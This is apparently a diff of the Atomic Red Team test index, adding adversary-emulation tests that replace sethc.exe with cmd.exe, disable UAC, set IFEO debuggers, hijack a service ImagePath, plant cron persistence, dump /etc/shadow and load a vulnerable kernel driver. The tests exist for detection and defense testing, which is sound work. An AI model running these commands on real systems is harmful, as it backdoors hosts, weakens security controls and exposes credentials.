-          NT\\CurrentVersion\\Image File Execution Options\\$item\"\n  IF(!(Test-Path
-          $registryPath))\n  {\n    New-Item -Path $registryPath -Force\n    New-ItemProperty
-          -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n
-          \ }\n  ELSE\n  {\n    New-ItemProperty -Path $registryPath -Name $name -Value
-          $Value\n  }\n}\n"
+        command: |
+          $input_table = "#{parent_list}".split(",")
+          $Name = "Debugger"
+          $Value = "#{attached_process}"
+          Foreach ($item in $input_table){
+            $item = $item.trim()
+            $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
+            IF(!(Test-Path $registryPath))
+            {
+              New-Item -Path $registryPath -Force
+              New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+            }
+            ELSE
+            {
+              New-ItemProperty -Path $registryPath -Name $name -Value $Value
+            }
+          }
        cleanup_command: |
          $input_table = "#{parent_list}".split(",")
          Foreach ($item in $input_table)
@@ -354,6 +363,24 @@ privilege-escalation:
          }
        name: powershell
        elevation_required: true
+    - name: Replace binary of sticky keys
+      auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+      description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+          takeown /F C:\Windows\System32\sethc.exe /A
+          icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+
+'
+        name: command_prompt
+        elevation_required: true
  T1546.009:
    technique:
      external_references:
@@ -1435,10 +1462,11 @@ privilege-escalation:
        elevation_required: true
    - name: Bypass UAC using sdclt DelegateExecute
      auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
-      description: "Bypasses User Account Control using a fileless method, registry
-        only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
-        - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
-        from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+      description: |
+        Bypasses User Account Control using a fileless method, registry only.
+        Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+        [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+        Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
      supported_platforms:
      - windows
      input_arguments:
@@ -1457,6 +1485,24 @@ privilege-escalation:

 '
        name: powershell
+    - name: Disable UAC using reg.exe
+      auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+      description: |
+        Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
+        HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          /v EnableLUA /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          /v EnableLUA /t REG_DWORD /d 1 /f
+
+'
+        name: command_prompt
+        elevation_required: true
  T1574.012:
    technique:
      external_references:
@@ -2097,11 +2143,12 @@ privilege-escalation:
        cleanup_command: 'crontab /tmp/notevil

 '
-    - name: Cron - Add script to cron folder
+    - name: Cron - Add script to all cron subfolders
      auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
-      description: 'This test adds a script to a cron folder configured to execute
-        on a schedule. This technique was used by the threat actor Rocke during the
-        exploitation of Linux web servers.
+      description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
+        /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
+        schedule. This technique was used by the threat actor Rocke during the exploitation
+        of Linux web servers.

 '
      supported_platforms:
@@ -2119,10 +2166,41 @@ privilege-escalation:
      executor:
        elevation_required: true
        name: bash
-        command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+        command: |
+          echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+          echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
+        cleanup_command: |
+          rm /etc/cron.daily/#{cron_script_name}
+          rm /etc/cron.hourly/#{cron_script_name}
+          rm /etc/cron.monthly/#{cron_script_name}
+          rm /etc/cron.weekly/#{cron_script_name}
+    - name: Cron - Add script to /var/spool/cron/crontabs/ folder
+      auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
+      description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
+        to execute on a schedule. This technique was used by the threat actor Rocke
+        during the exploitation of Linux web servers.

 '
-        cleanup_command: 'rm /etc/cron.daily/#{cron_script_name}
+      supported_platforms:
+      - linux
+      input_arguments:
+        command:
+          description: Command to execute
+          type: string
+          default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
+        cron_script_name:
+          description: Name of file to store in /var/spool/cron/crontabs folder
+          type: string
+          default: persistevil
+      executor:
+        elevation_required: true
+        name: bash
+        command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
+
+'
+        cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}

 '
  T1574.001:
@@ -6767,9 +6845,9 @@ privilege-escalation:
    atomic_tests:
    - name: Service Registry Permissions Weakness
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
-      description: "Service registry permissions weakness check and then which can
-        lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\"
-        /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n"
+      description: |
+        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -6782,6 +6860,48 @@ privilege-escalation:
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
        name: powershell
+    - name: Service ImagePath Change with reg.exe
+      auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+      description: 'Change Service registry ImagePath of a bengin service to a malicious
+        file
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        weak_service_name:
+          description: weak service name
+          type: String
+          default: calcservice
+        weak_service_path:
+          description: weak service path
+          type: String
+          default: "%windir%\\system32\\win32calc.exe"
+        malicious_service_path:
+          description: malicious service path
+          type: String
+          default: "%windir%\\system32\\cmd.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The service must exist (#{weak_service_name})
+
+'
+        prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+
+'
+      executor:
+        command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
+          /f /v ImagePath /d "#{malicious_service_path}"
+
+'
+        cleanup_command: 'sc.exe delete #{weak_service_name}
+
+'
+        name: command_prompt
  T1548.001:
    technique:
      external_references:
@@ -8465,14 +8585,23 @@ persistence:
          type: Path
          default: C:\windows\system32\cmd.exe
      executor:
-        command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value
-          = \"#{attached_process}\"\nForeach ($item in $input_table){   \n  $item
-          = $item.trim()\n  $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
-          NT\\CurrentVersion\\Image File Execution Options\\$item\"\n  IF(!(Test-Path
-          $registryPath))\n  {\n    New-Item -Path $registryPath -Force\n    New-ItemProperty
-          -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n
-          \ }\n  ELSE\n  {\n    New-ItemProperty -Path $registryPath -Name $name -Value
-          $Value\n  }\n}\n"
+        command: |
+          $input_table = "#{parent_list}".split(",")
+          $Name = "Debugger"
+          $Value = "#{attached_process}"
+          Foreach ($item in $input_table){
+            $item = $item.trim()
+            $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
+            IF(!(Test-Path $registryPath))
+            {
+              New-Item -Path $registryPath -Force
+              New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+            }
+            ELSE
+            {
+              New-ItemProperty -Path $registryPath -Name $name -Value $Value
+            }
+          }
        cleanup_command: |
          $input_table = "#{parent_list}".split(",")
          Foreach ($item in $input_table)
@@ -8482,6 +8611,24 @@ persistence:
          }
        name: powershell
        elevation_required: true
+    - name: Replace binary of sticky keys
+      auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+      description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+          takeown /F C:\Windows\System32\sethc.exe /A
+          icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+
+'
+        name: command_prompt
+        elevation_required: true
  T1098:
    technique:
      object_marking_refs:
@@ -10772,11 +10919,12 @@ persistence:
        cleanup_command: 'crontab /tmp/notevil

 '
-    - name: Cron - Add script to cron folder
+    - name: Cron - Add script to all cron subfolders
      auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
-      description: 'This test adds a script to a cron folder configured to execute
-        on a schedule. This technique was used by the threat actor Rocke during the
-        exploitation of Linux web servers.
+      description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
+        /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
+        schedule. This technique was used by the threat actor Rocke during the exploitation
+        of Linux web servers.

 '
      supported_platforms:
@@ -10794,10 +10942,41 @@ persistence:
      executor:
        elevation_required: true
        name: bash
-        command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+        command: |
+          echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+          echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
+        cleanup_command: |
+          rm /etc/cron.daily/#{cron_script_name}
+          rm /etc/cron.hourly/#{cron_script_name}
+          rm /etc/cron.monthly/#{cron_script_name}
+          rm /etc/cron.weekly/#{cron_script_name}
+    - name: Cron - Add script to /var/spool/cron/crontabs/ folder
+      auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
+      description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
+        to execute on a schedule. This technique was used by the threat actor Rocke
+        during the exploitation of Linux web servers.

 '
-        cleanup_command: 'rm /etc/cron.daily/#{cron_script_name}
+      supported_platforms:
+      - linux
+      input_arguments:
+        command:
+          description: Command to execute
+          type: string
+          default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
+        cron_script_name:
+          description: Name of file to store in /var/spool/cron/crontabs folder
+          type: string
+          default: persistevil
+      executor:
+        elevation_required: true
+        name: bash
+        command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
+
+'
+        cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}

 '
  T1574.001:
@@ -11579,7 +11758,51 @@ persistence:
      - Daniel Oakley
      - Travis Smith, Tripwire
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1133
+    atomic_tests:
+    - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
+      auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4
+      description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
+        please see "T1133\src\list of vpn extension.txt" to view complete list
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        chrome_url:
+          description: chrome installer download URL
+          type: url
+          default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
+        extension_id:
+          description: chrome extension id
+          type: String
+          default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
+
+'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'chrome must be installed
+
+'
+        prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+          Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $extList = #{extension_id}
+          foreach ($extension in $extList) {
+            New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+            New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+          Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+          Start-Sleep -Seconds 30
+          Stop-Process -Name "chrome"
+        cleanup_command: |-
+          $extList = #{extension_id}
+          foreach ($extension in $extList) {
+          Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
  T1574:
    technique:
      external_references:
@@ -15405,9 +15628,9 @@ persistence:
    atomic_tests:
    - name: Service Registry Permissions Weakness
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
-      description: "Service registry permissions weakness check and then which can
-        lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\"
-        /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n"
+      description: |
+        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -15420,6 +15643,48 @@ persistence:
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
        name: powershell
+    - name: Service ImagePath Change with reg.exe
+      auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+      description: 'Change Service registry ImagePath of a bengin service to a malicious
+        file
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        weak_service_name:
+          description: weak service name
+          type: String
+          default: calcservice
+        weak_service_path:
+          description: weak service path
+          type: String
+          default: "%windir%\\system32\\win32calc.exe"
+        malicious_service_path:
+          description: malicious service path
+          type: String
+          default: "%windir%\\system32\\cmd.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The service must exist (#{weak_service_name})
+
+'
+        prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+
+'
+      executor:
+        command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
+          /f /v ImagePath /d "#{malicious_service_path}"
+
+'
+        cleanup_command: 'sc.exe delete #{weak_service_name}
+
+'
+        name: command_prompt
  T1547.009:
    technique:
      external_references:
@@ -16777,7 +17042,45 @@ credential-access:
      x_mitre_is_subtechnique: true
      x_mitre_platforms:
      - Linux
-    atomic_tests: []
+      identifier: T1003.008
+    atomic_tests:
+    - name: Access /etc/shadow (Local)
+      auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
+      description: "/etc/shadow file is accessed in Linux environments\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.008.txt"
+      executor:
+        command: |
+          sudo cat /etc/shadow > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file}
+
+'
+        name: bash
+        elevation_required: true
+    - name: Access /etc/passwd (Local)
+      auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+      description: "/etc/passwd file is accessed in Linux environments\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.008.txt"
+      executor:
+        command: |
+          cat /etc/passwd > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file}
+
+'
+        name: sh
  T1552.003:
    technique:
      external_references:
@@ -22120,10 +22423,11 @@ defense-evasion:
        elevation_required: true
    - name: Bypass UAC using sdclt DelegateExecute
      auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
-      description: "Bypasses User Account Control using a fileless method, registry
-        only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
-        - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
-        from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+      description: |
+        Bypasses User Account Control using a fileless method, registry only.
+        Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+        [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+        Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
      supported_platforms:
      - windows
      input_arguments:
@@ -22142,6 +22446,24 @@ defense-evasion:

 '
        name: powershell
+    - name: Disable UAC using reg.exe
+      auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+      description: |
+        Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
+        HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          /v EnableLUA /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          /v EnableLUA /t REG_DWORD /d 1 /f
+
+'
+        name: command_prompt
+        elevation_required: true
  T1218.003:
    technique:
      external_references:
@@ -33077,27 +33399,41 @@ defense-evasion:
        elevation_required: true
    - name: Windows Signed Driver Rootkit Test
      auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
-      description: |
-        This test exploits a signed driver to execute code in Kernel.
-        SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
-        We leverage the work done here:
-        https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
-        The hash of our PoC Exploit is
-        SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
-        This will simulate hiding a process.
-        It would be wise if you only run this in a test environment
+      description: "This test exploits a signed driver to execute code in Kernel.\nThis
+        example was curated from a blog that utilizes puppetstrings.exe with the vulnerable
+        (signed driver) capcom.sys. \nThe capcom.sys driver may be found on github.
+        A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html\nSHA1
+        C1D5CF8C43E7679B782630E93F5E6420CA1749A7\nWe leverage the work done here:\nhttps://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html\nThe
+        hash of our PoC Exploit is\nSHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441\nThis
+        will simulate hiding a process.\n"
      supported_platforms:
      - windows
      input_arguments:
        driver_path:
-          description: Path to the vulnerable driver
+          description: Path to a vulnerable driver
          type: Path
          default: C:\Drivers\driver.sys
-      executor:
-        command: 'puppetstrings #{driver_path}
+        puppetstrings_path:
+          description: Path of puppetstrings.exe
+          type: Path
+          default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})

 '
+        prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe"
+          -OutFile "#{puppetstrings_path}"
+
+'
+      executor:
        name: command_prompt
+        command: "#{puppetstrings_path} #{driver_path}\n"
+        elevation_required: true
  T1564.006:
    technique:
      external_references:
@@ -33757,9 +34093,9 @@ defense-evasion:
    atomic_tests:
    - name: Service Registry Permissions Weakness
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
-      description: "Service registry permissions weakness check and then which can
-        lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\"
-        /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n"
+      description: |
+        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -33772,6 +34108,48 @@ defense-evasion:
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
          get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
        name: powershell
+    - name: Service ImagePath Change with reg.exe
+      auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+      description: 'Change Service registry ImagePath of a bengin service to a malicious
+        file
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        weak_service_name:
+          description: weak service name
+          type: String
+          default: calcservice
+        weak_service_path:
+          description: weak service path
+          type: String
+          default: "%windir%\\system32\\win32calc.exe"
+        malicious_service_path:
+          description: malicious service path
+          type: String
+          default: "%windir%\\system32\\cmd.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The service must exist (#{weak_service_name})
+
+'
+        prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+
+'
+      executor:
+        command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
+          /f /v ImagePath /d "#{malicious_service_path}"
+
+'
+        cleanup_command: 'sc.exe delete #{weak_service_name}
+
+'
+        name: command_prompt
  T1548.001:
    technique:
      external_references:
@@ -34092,7 +34470,7 @@ defense-evasion:
      executor:
        name: command_prompt
        elevation_required: false
-        command: '#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
+        command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

 '
  T1216:
@@ -36216,6 +36594,40 @@ defense-evasion:

 '
        name: command_prompt
+    - name: attrib - hide file
+      auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
+      description: |
+        Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that
+        the victim does not see the file.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_or_folder:
+          description: Path of the file or folder remove attribute.
+          type: path
+          default: "%temp%\\T1222.001_attrib_2"
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: 'Test requires a file to modify to be located at (#{file_or_folder})
+
+'
+        prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
+
+'
+        get_prereq_command: |
+          mkdir #{file_or_folder}
+          echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
+          echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
+      executor:
+        command: |
+          attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
+          attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
+        cleanup_command: |
+          attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt
+          attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt
+          del #{file_or_folder}\T1222.001_attrib*.txt
+          rmdir #{file_or_folder}
+        name: command_prompt
    - name: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style
      auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
      description: Invokes the command line used by Ryuk Ransomware to grant full
@@ -39327,6 +39739,7 @@ discovery:
          net localgroup
          net group /domain
          net group "domain admins" /domain
+          net group "enterprise admins" /domain
        name: command_prompt
    - name: Permission Groups Discovery PowerShell (Domain)
      auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
@@ -42107,6 +42520,19 @@ discovery:
      executor:
        command: "#{adfind_path} -f (objectcategory=subnet)\n"
        name: command_prompt
+    - name: Qakbot Recon
+      auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b
+      description: A list of commands known to be performed by Qakbot for recon purposes
+      supported_platforms:
+      - windows
+      input_arguments:
+        recon_commands:
+          description: File that houses list of commands to be executed
+          type: Path
+          default: PathToAtomicsFolder\T1016\src\qakbot.bat
+      executor:
+        command: "#{recon_commands}\n"
+        name: command_prompt
  T1049:
    technique:
      object_marking_refs:
@@ -43241,11 +43667,12 @@ execution:
        cleanup_command: 'crontab /tmp/notevil

 '
-    - name: Cron - Add script to cron folder
+    - name: Cron - Add script to all cron subfolders
      auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
-      description: 'This test adds a script to a cron folder configured to execute
-        on a schedule. This technique was used by the threat actor Rocke during the
-        exploitation of Linux web servers.
+      description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
+        /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
+        schedule. This technique was used by the threat actor Rocke during the exploitation
+        of Linux web servers.

 '
      supported_platforms:
@@ -43263,10 +43690,41 @@ execution:
      executor:
        elevation_required: true
        name: bash
-        command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+        command: |
+          echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+          echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
+          echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
+        cleanup_command: |
+          rm /etc/cron.daily/#{cron_script_name}
+          rm /etc/cron.hourly/#{cron_script_name}
+          rm /etc/cron.monthly/#{cron_script_name}
+          rm /etc/cron.weekly/#{cron_script_name}
+    - name: Cron - Add script to /var/spool/cron/crontabs/ folder
+      auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
+      description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
+        to execute on a schedule. This technique was used by the threat actor Rocke
+        during the exploitation of Linux web servers.

 '
-        cleanup_command: 'rm /etc/cron.daily/#{cron_script_name}
+      supported_platforms:
+      - linux
+      input_arguments:
+        command:
+          description: Command to execute
+          type: string
+          default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
+        cron_script_name:
+          description: Name of file to store in /var/spool/cron/crontabs folder
+          type: string
+          default: persistevil
+      executor:
+        elevation_required: true
+        name: bash
+        command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
+
+'
+        cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}

 '
  T1559.002:
@@ -54456,7 +54914,51 @@ initial-access:
      - Daniel Oakley
      - Travis Smith, Tripwire
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1133
+    atomic_tests:
+    - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
+      auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4
+      description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
+        please see "T1133\src\list of vpn extension.txt" to view complete list
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        chrome_url:
+          description: chrome installer download URL
+          type: url
+          default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
+        extension_id:
+          description: chrome extension id
+          type: String
+          default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
+
